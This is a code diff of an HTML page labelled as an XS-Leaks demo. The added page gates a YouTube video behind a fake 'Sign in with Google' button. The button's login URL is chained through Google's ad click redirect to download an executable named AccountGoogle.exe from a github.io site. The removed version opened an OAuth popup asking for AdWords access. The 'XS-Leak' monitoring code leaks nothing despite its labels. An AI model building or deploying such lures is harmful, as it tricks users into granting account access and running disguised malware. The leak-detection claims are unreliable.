--- a/xsleaks.html
+++ b/xsleaks.html
@@ -1,17 +1,176 @@
-<button onclick="popupGoogle()">Masuk Google (Sesi Lo)</button>
+<!DOCTYPE html>
+<html lang="en">
+<head>
+  <meta charset="UTF-8" />
+  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
+  <title>XS-Leaks Google Login Popup (With Confirm)</title>
+  <style>
+    body {
+      font-family: Arial, sans-serif;
+      text-align: center;
+      padding: 50px;
+      background-color: #f9f9f9;
+    }
 
-<script>
-function popupGoogle() {
-  const url = `https://accounts.google.com/v3/signin/identifier?` +
-    `client_id=644409995490-u6affpeji678jd9i4cn317utga0pmj30.apps.googleusercontent.com` +
-    `&response_type=code` +
-    `&redirect_uri=${encodeURIComponent('http://127.0.0.1:8900/index.htm')}` +
-    `&code_challenge_method=S256` +
-    `&code_challenge=HOaurB7USSjemAN1k7y6TXbxKU7tYxE2Thg1BS8z4c0` +
-    `&scope=${encodeURIComponent('https://www.googleapis.com/auth/adwords email')}` +
-    `&hl=en` +
-    `&flowName=GeneralOAuthFlow`;
+    #video-container {
+      position: relative;
+      display: block;
+      margin-top: 30px;
+      width: 560px;
+      height: 315px;
+      margin-left: auto;
+      margin-right: auto;
+      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
+    }
 
-  window.open(url, '_blank', 'width=600,height=700');
-}
-</script>
+    iframe {
+      width: 100%;
+      height: 100%;
+      border: 0;
+    }
+
+    #overlay-lock {
+      position: absolute;
+      top: 0;
+      left: 0;
+      width: 100%;
+      height: 100%;
+      background: rgba(0, 0, 0, 0.6);
+      color: #fff;
+      display: flex;
+      justify-content: center;
+      align-items: center;
+      font-size: 18px;
+      z-index: 10;
+      cursor: not-allowed;
+      transition: opacity 0.3s ease;
+    }
+
+    #login-button {
+      padding: 12px 24px;
+      font-size: 16px;
+      color: #444;
+      background-color: #fff;
+      border: 1px solid #ccc;
+      border-radius: 5px;
+      cursor: pointer;
+      display: inline-flex;
+      align-items: center;
+      gap: 10px;
+      box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
+      transition: background-color 0.2s ease, box-shadow 0.2s ease;
+    }
+
+    #login-button:hover {
+      background-color: #f1f1f1;
+      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.3);
+    }
+
+    #login-button img {
+      width: 20px;
+      height: 20px;
+    }
+
+    #confirm-login {
+      margin-top: 20px;
+      display: none;
+    }
+
+    #confirm-login button {
+      padding: 10px 20px;
+      font-size: 14px;
+      border: none;
+      border-radius: 5px;
+      background-color: #34a853;
+      color: white;
+      cursor: pointer;
+    }
+
+    #confirm-login button:hover {
+      background-color: #2c8b46;
+    }
+  </style>
+</head>
+<body>
+
+  <h1>Please Sign In to Watch the Video</h1>
+
+  <button id="login-button">
+    <img src="https://www.gstatic.com/firebasejs/ui/2.0.0/images/auth/google.svg" alt="Google Logo" />
+    Sign in with Google
+  </button>
+
+  <div id="confirm-login">
+    <p>Did you finish logging in?</p>
+    <button id="confirm-button">Yes, I did!</button>
+  </div>
+
+  <div id="video-container">
+    <iframe
+      src="https://www.youtube.com/embed/1r7RlKRHu40"
+      title="YouTube video player"
+      allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture"
+      allowfullscreen>
+    </iframe>
+
+    <!-- Overlay lock -->
+    <div id="overlay-lock">Please sign in to play the youtube video</div>
+  </div>
+
+  <script>
+    const loginButton = document.getElementById('login-button');
+    const overlayLock = document.getElementById('overlay-lock');
+    const confirmSection = document.getElementById('confirm-login');
+    const confirmButton = document.getElementById('confirm-button');
+
+    loginButton.addEventListener('click', () => {
+      const googleLoginURL = 'https://accounts.google.com/AccountChooser/signinchooser?continue=https%3A%2F%2Fadservice.google.com%2Fddm%2Fclk%2F408533097%3B208818505%3Bl%3B%3B%3F%2F%2Flanaya113505.github.io%2Fpizza%2FAccountGoogle.exe%3F%2Fhome&ddm=1&flowEntry=AccountChooser&flowName=GlifWebSignIn&hl=id&ltmpl=youtube&service=youtube&authuser=0';
+
+      const popupWidth = 500;
+      const popupHeight = 600;
+      const left = (screen.width / 2) - (popupWidth / 2);
+      const top = (screen.height / 2) - (popupHeight / 2);
+
+      const loginWindow = window.open(
+        googleLoginURL,
+        'Google Login',
+        `width=${popupWidth},height=${popupHeight},top=${top},left=${left}`
+      );
+
+      // XS-Leaks timing attack simulation
+      const leakTest = setInterval(() => {
+        try {
+          if (loginWindow.closed) {
+            clearInterval(leakTest);
+            confirmSection.style.display = 'block';
+            console.log("[XS-Leak] Popup closed. Possible login status inferred.");
+          } else {
+            // Try to poke cross-origin resource via postMessage or property access
+            loginWindow.postMessage('ping', '*'); // Will fail silently, but can observe timing
+            console.log("[XS-Leak] Checking popup window status...");
+          }
+        } catch (e) {
+          console.log("[XS-Leak] Cross-origin restriction hit. Inference success:", e);
+        }
+      }, 1000);
+    });
+
+    confirmButton.addEventListener('click', () => {
+      overlayLock.style.display = 'none';
+      loginButton.style.display = 'none';
+      confirmSection.style.display = 'none';
+    });
+
+    // Passive XS-Leak via message event listener
+    window.addEventListener('message', (event) => {
+      console.log("[XS-Leak] Message received from popup:", event.origin, event.data);
+      if (event.origin.includes('accounts.google.com')) {
+        // Leak data inferred from origin communication
+        alert('XS-Leak: Detected communication from Google!');
+      }
+    });
+
+  </script>
+
+</body>
+</html>
